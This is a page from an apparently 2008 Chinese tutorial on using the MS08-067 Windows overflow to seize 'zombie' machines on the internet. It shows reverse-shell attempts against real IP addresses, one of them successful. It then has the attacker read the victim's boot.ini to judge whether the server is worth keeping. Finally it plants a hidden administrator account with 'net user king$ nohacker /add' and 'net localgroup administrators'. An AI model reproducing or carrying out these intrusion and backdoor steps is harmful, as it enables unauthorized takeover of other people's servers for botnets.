WEB开发网
开发学院网络安全安全技术 利用MS08067远程溢出漏洞抓肉鸡 阅读

利用MS08067远程溢出漏洞抓肉鸡

 2008-12-02 13:34:46 来源:WEB开发网   
核心提示: Warning: forward host lookup failed for 71.27.22.218.broad.static.hf.ah.cndata.com: h_errno 11002: TRY_AGAIN71.27.22.218.broad.static.hf.ah.cndat

Warning: forward host lookup failed for 71.27.22.218.broad.static.hf.ah.cndata.com: h_errno 11002: TRY_AGAIN71.27.22.218.broad.static.hf.ah.cndata.com [218.22.27.71] 4444 (?): TIMEDOUT sent 0, rcvd 0: NOTSOCK”,这说明218.22.27.71可能已经安装补丁、防火墙禁止对外进行连接等情况,导致溢出不成功。

说明:

在MS08067中可以定制监听端口,不过那个端口需要在源程序中定制。

4.继续进行溢出

换另外一个IP地址执行溢出,重新监听该IP地址,如图3所示,出来我们比较熟悉的反弹Shell串口,终于看到了希望,我在本地虚拟机上执行了多次测试,都未成功,但在实际环境中却测试成功。

利用MS08067远程溢出漏洞抓肉鸡

图3 溢出成功

5.查看服务器信息

对溢出的计算机先要看看其配置等信息,例如查看操作系统版本、系统配置情况等,然后决定是否对其进行控制等后续操作,如果仅仅是普通个人计算机,而且配置极差,控制住的意义都不大。在这里使用“type c:boot.ini”查看操作系统类型,如图4所示,该服务器为Windows 2003企业版服务器,显然有进一步控制的必要了。

利用MS08067远程溢出漏洞抓肉鸡

图4 查看服务器版本等信息

6.添加管理员账号

既然是服务器那就先添加一个管理员帐号吧,如图5所示使用“net user king$ nohacker /add”、“net localgroup administrators king$ /add”以及“net localgroup administrators”命令添加“king$”用户,密码为“nohacker”,并查看是否将“king$”用户加入到管理员组中。

上一页  1 2 3 4 5 6 7  下一页

Tags:利用 MS 远程

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接